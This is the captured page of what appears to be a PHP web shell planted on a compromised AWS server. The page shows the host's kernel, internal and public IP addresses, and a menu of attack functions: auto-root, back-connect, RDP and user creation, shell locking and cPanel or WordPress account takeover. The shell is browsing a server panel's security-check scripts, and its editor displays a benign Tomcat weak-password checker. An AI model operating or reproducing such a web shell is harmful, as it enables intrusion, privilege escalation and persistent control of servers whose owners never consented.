Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.224.202.121
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
safe_warning_v2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
sw_alias_ls_rm.py
1.56
KB
-rw-r--r--
sw_audit_docker.py
1.09
KB
-rw-r--r--
sw_audit_log_keep.py
1.1
KB
-rw-r--r--
sw_bashrc.py
1.82
KB
-rw-r--r--
sw_bootloader_mod.py
1.65
KB
-rw-r--r--
sw_chmod_sid.py
1.55
KB
-rw-r--r--
sw_chmod_stickybit.py
1.31
KB
-rw-r--r--
sw_cshrc.py
1.88
KB
-rw-r--r--
sw_cve_2019_5736.py
1.86
KB
-rw-r--r--
sw_cve_2021_4034.py
4.01
KB
-rw-r--r--
sw_cve_2022_2068.py
2.55
KB
-rw-r--r--
sw_cve_2022_25845.py
3.03
KB
-rw-r--r--
sw_cve_2023_0386.py
3.94
KB
-rw-r--r--
sw_database_backup.py
2.21
KB
-rw-r--r--
sw_database_priv.py
2.39
KB
-rw-r--r--
sw_debug_mode.py
1.67
KB
-rw-r--r--
sw_dir_mode.py
3.17
KB
-rw-r--r--
sw_docker_api.py
2.33
KB
-rw-r--r--
sw_docker_mod.py
1.62
KB
-rw-r--r--
sw_empty_passwd_user.py
1.4
KB
-rw-r--r--
sw_file_lock.py
1.64
KB
-rw-r--r--
sw_file_mod.py
2.48
KB
-rw-r--r--
sw_files_recycle_bin.py
1.64
KB
-rw-r--r--
sw_firewall_open.py
2.07
KB
-rw-r--r--
sw_ftp_login.py
1.23
KB
-rw-r--r--
sw_ftp_pass.py
2.02
KB
-rw-r--r--
sw_ftp_root.py
1.51
KB
-rw-r--r--
sw_ftp_umask.py
1.17
KB
-rw-r--r--
sw_httpd_trace_enable.py
1.28
KB
-rw-r--r--
sw_httpd_version_leak.py
1.56
KB
-rw-r--r--
sw_kernel_space.py
1.69
KB
-rw-r--r--
sw_login_fail_limit.py
1.52
KB
-rw-r--r--
sw_login_message.py
1.86
KB
-rw-r--r--
sw_login_user.py
2.26
KB
-rw-r--r--
sw_memcached_port.py
2.08
KB
-rw-r--r--
sw_mongodb_auth.py
1.15
KB
-rw-r--r--
sw_mysql_pass.py
1.66
KB
-rw-r--r--
sw_mysql_port.py
3.38
KB
-rw-r--r--
sw_mysql_priv.py
2.39
KB
-rw-r--r--
sw_nginx_malware.py
1.28
KB
-rw-r--r--
sw_nginx_md5.py
1.26
KB
-rw-r--r--
sw_nginx_server.py
1.85
KB
-rw-r--r--
sw_panel_control.py
1.39
KB
-rw-r--r--
sw_panel_pass.py
13.99
KB
-rw-r--r--
sw_panel_path.py
2.67
KB
-rw-r--r--
sw_panel_port.py
1.78
KB
-rw-r--r--
sw_panel_swing.py
1.51
KB
-rw-r--r--
sw_passwd_repeat.py
1.14
KB
-rw-r--r--
sw_php_backdoor.py
2.89
KB
-rw-r--r--
sw_php_disable_functions.py
2.96
KB
-rw-r--r--
sw_php_display_errors.py
2.39
KB
-rw-r--r--
sw_php_expose.py
2.39
KB
-rw-r--r--
sw_ping.py
1.83
KB
-rw-r--r--
sw_pingin.py
1.67
KB
-rw-r--r--
sw_pip_poison.py
1.44
KB
-rw-r--r--
sw_protected_hardlinks.py
1.74
KB
-rw-r--r--
sw_protected_symlinks.py
1.81
KB
-rw-r--r--
sw_redis_pass.py
1.93
KB
-rw-r--r--
sw_redis_port.py
3.42
KB
-rw-r--r--
sw_risk_file.py
1.53
KB
-rw-r--r--
sw_site_logs.py
2.69
KB
-rw-r--r--
sw_site_spath.py
3.39
KB
-rw-r--r--
sw_site_ssl.py
2.01
KB
-rw-r--r--
sw_site_ssl_expire.py
3.1
KB
-rw-r--r--
sw_ssh_clientalive.py
2.53
KB
-rw-r--r--
sw_ssh_forward.py
1.19
KB
-rw-r--r--
sw_ssh_hosts.py
1.03
KB
-rw-r--r--
sw_ssh_login_grace.py
1.77
KB
-rw-r--r--
sw_ssh_maxauth.py
2.42
KB
-rw-r--r--
sw_ssh_minclass.py
1.83
KB
-rw-r--r--
sw_ssh_notpass.py
2.09
KB
-rw-r--r--
sw_ssh_passmax.py
2.2
KB
-rw-r--r--
sw_ssh_passmin.py
1.91
KB
-rw-r--r--
sw_ssh_port.py
3.18
KB
-rw-r--r--
sw_ssh_root.py
1.75
KB
-rw-r--r--
sw_ssh_security.py
1.81
KB
-rw-r--r--
sw_ssh_v2.py
1.09
KB
-rw-r--r--
sw_strace_backdoor.py
1.33
KB
-rw-r--r--
sw_su_root.py
1.59
KB
-rw-r--r--
sw_sudoers_nopasswd.py
1.79
KB
-rw-r--r--
sw_suid_dumpable.py
1.67
KB
-rw-r--r--
sw_system_user.py
1.24
KB
-rw-r--r--
sw_tcp_syn_cookie.py
1.04
KB
-rw-r--r--
sw_telnet_server.py
962
B
-rw-r--r--
sw_time_out.py
1.16
KB
-rw-r--r--
sw_tmp_malware.py
1.49
KB
-rw-r--r--
sw_tomcat_pass.py
2.25
KB
-rw-r--r--
sw_umask.py
1.81
KB
-rw-r--r--
sw_waf_install.py
2.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sw_tomcat_pass.py
#!/usr/bin/python #coding: utf-8 import os, re, public _title = 'tomcat Background Access Weak Password Detection' _version = 1.0 # 版本 _ps = "tomcat Background Access Weak Password Detection" # 描述 _level = 3 # 风险级别: 1.提示(低) 2.警告(中) 3.危险(高) _date = '2023-03-13' # 最后更新时间 _ignore = os.path.exists("data/warning/ignore/sw_tomcat_pass.pl") _tips = [ "Change password weak password in【/usr/local/bttomcat/tomcat/conf/tomcat-users.xml】", ] _help = '' _remind = 'This scheme by strengthening the tomcat background login password strength, reduce the risk of being exploded, to avoid hackers using tomcat to invade the server. ' def check_run(): ''' @name 开始检测 @return tuple (status<bool>,msg<string>) ''' tomcat_conf = '/usr/local/bttomcat/tomcat{}/conf/tomcat-users.xml' version = ['7','8','9'] vul_list = [] # 第一步先用正则找到密码的输入点 rep = 'password(\\s*)=(\\s*)[\"\'](.*?)[\"\']' for v in version: annotator = 0 if not os.path.exists(tomcat_conf.format(v)): continue with open(tomcat_conf.format(v)) as f: lines = f.readlines() # 通过逐行判断是否存在注释符闭合,以annotator作锁计数,存在左闭合则+1,存在右闭合-1,当annotator值为0时才不在闭合范围内 for l in lines: if '<!--' in l: annotator += 1 if '-->' in l: annotator -= 1 if '<!--' in l and '-->' in l: continue if annotator != 0: continue if 'manager-gui' in l and 'password' in l: tmp = re.search(rep, l.rstrip()) passwd = tmp.group(3).strip() for d in get_pass_list(): if passwd == d: vul_list.append(v) if vul_list: return False, 'tomcat{} has a weak background password'.format('、'.join(vul_list)) else: return True, 'Risk-free' # 获取弱口令字典 def get_pass_list(): pass_info = public.ReadFile("/www/server/panel/config/weak_pass.txt") return pass_info.split('\n')
Close